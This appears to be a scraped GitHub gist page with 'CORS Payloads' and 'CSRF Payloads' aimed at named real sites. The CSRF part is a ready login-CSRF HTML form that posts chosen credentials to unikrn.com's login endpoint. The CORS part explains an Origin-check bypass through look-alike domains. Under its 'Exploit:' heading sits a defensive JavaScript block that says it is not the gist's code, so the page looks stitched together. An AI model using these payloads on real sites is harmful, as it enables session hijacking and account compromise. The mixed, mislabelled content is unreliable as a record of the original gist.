hackerhumble

💭
Hacking....
View GitHub Profile
@hackerhumble
hackerhumble / cors.txt
Created September 7, 2019 17:45
CORS Payloads
Payload: use this payload to send an XHR request to the cross-domain endpoint.
Description:
Basically, the application was only checking whether "//niche.co" was in the Origin header, which means I can give anything containing that. For example: "https://niche.co.evil.net" or "https://niche.com"; I can even change the protocol to http, ftp, file, etc. (screenshot: cors_1.png)
Steps To Reproduce:
Exploit:
Host this code on a domain (http://niche.co.evil.net) or any other whose origin contains "//niche.co".
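As an added defender-side illustration (not the gist's own code), the following JavaScript contrasts the substring-style Origin check described above with an exact-match allowlist check and shows which response headers each would produce. The allowlist contents, function names and sample origins are assumptions constructed here.

```javascript
// Added example, not from the gist. Names, the allowlist and the sample
// origins are constructed assumptions for this illustration.

// Vulnerable check: only asks whether "//niche.co" occurs anywhere in the
// Origin header, so "https://niche.co.evil.net", "https://niche.com" and
// "ftp://niche.co" all pass.
function vulnerableOriginCheck(origin) {
  return typeof origin === 'string' && origin.includes('//niche.co');
}

// Assumed allowlist of complete origins (scheme + host + port).
const ALLOWED_ORIGINS = new Set(['https://niche.co', 'https://www.niche.co']);

// Hardened check: parse the Origin header with the WHATWG URL parser and
// compare its serialized origin against the allowlist. Malformed values and
// the literal "null" origin fail to parse and are rejected.
function safeOriginCheck(origin) {
  if (typeof origin !== 'string') return false;
  let parsed;
  try {
    parsed = new URL(origin);
  } catch (e) {
    return false;
  }
  return ALLOWED_ORIGINS.has(parsed.origin);
}

// Response headers a CORS-aware endpoint would emit. Credentials are only
// allowed when the origin passed the supplied check; otherwise no
// Access-Control-Allow-Origin header is sent at all (never fall back to "*"
// together with credentials).
function corsHeaders(origin, check) {
  if (!check(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Constructed sample origins: the ones the write-up lists plus the real site.
const SAMPLE_ORIGINS = [
  'https://niche.co',
  'https://niche.co.evil.net',
  'https://niche.com',
  'http://niche.co',
  'ftp://niche.co',
];

// Run both checks over the samples and return one row per origin.
function compareChecks() {
  return SAMPLE_ORIGINS.map((o) => ({
    origin: o,
    vulnerable: vulnerableOriginCheck(o),
    safe: safeOriginCheck(o),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(compareChecks());
}
```

Only the first sample origin passes `safeOriginCheck`; the other four pass the substring check, which is exactly the gap the write-up describes.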
hackerhumble / csrf.txt
Created September 7, 2019 17:43
CSRF Payloads
**Sample CSRF Payload**
<html>
<body>
<!-- Cross-site form that POSTs attacker-chosen credentials to the login endpoint (login CSRF) -->
<form action="https://unikrn.com/apiv1/login" method="POST">
<input type="hidden" name="usr" value="[email]">
<input type="hidden" name="pwd" value="[password]">
<input type="submit" value="Submit request" />
</form>
</body>
</html>